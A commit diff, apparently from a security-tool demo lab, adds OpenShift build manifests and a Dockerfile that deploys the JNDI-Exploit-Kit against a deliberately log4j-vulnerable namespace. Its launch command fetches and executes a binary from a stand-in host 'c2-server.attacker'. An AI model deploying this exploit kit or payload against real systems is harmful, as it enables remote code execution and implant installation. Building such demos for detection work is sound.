build exploitkit

cicd/01-imagestream.yaml

@@ -6,3 +6,12 @@ metadata:
   name: vulnerable-log4j
   namespace: vulnerable-cicd
 spec:
+---
+kind: ImageStream
+apiVersion: image.openshift.io/v1
+metadata:
+  annotations:
+    openshift.io/display-name: Exploit for log4j
+  name: exploitkit-log4j
+  namespace: vulnerable-cicd
+spec:

cicd/02-buildconfig.yaml

@@ -26,3 +26,32 @@ spec:
       imageChange: {}
     - type: ConfigChange
   runPolicy: Serial
+---
+kind: BuildConfig
+apiVersion: build.openshift.io/v1
+metadata:
+  name: exploitkit-log4j
+  namespace: vulnerable-cicd
+spec:
+  output:
+    to:
+      kind: ImageStreamTag
+      name: 'exploitkit-log4j:latest'
+  strategy:
+    type: Docker
+    dockerStrategy:
+      from:
+        kind: ImageStreamTag
+        namespace: openshift
+        name: 'java:11'
+  source:
+    type: Git
+    git:
+      uri: 'https://github.com/nmasse-itix/demo-rhacs.git'
+      ref: main
+    contextDir: exploit
+  triggers:
+    - type: ImageChange
+      imageChange: {}
+    - type: ConfigChange
+  runPolicy: Serial

exploit/Dockerfile

@@ -0,0 +1,4 @@
+FROM docker.io/library/openjdk:11
+
+RUN curl -Lo /JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar https://github.com/pimps/JNDI-Exploit-Kit/raw/master/target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar
+CMD [ "java", "-jar", "/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar", "-C", "curl -o /tmp/agent.bin https://c2-server.attacker/agent.bin ; chmod 755 /tmp/agent.bin ; /tmp/agent.bin", "-J", "jndi-exploit-kit.exploitkit-log4.svc:8080", "-L", "jndi-exploit-kit.exploitkit-log4.svc:1389", "-R", "jndi-exploit-kit.exploitkit-log4.svc:1099" ]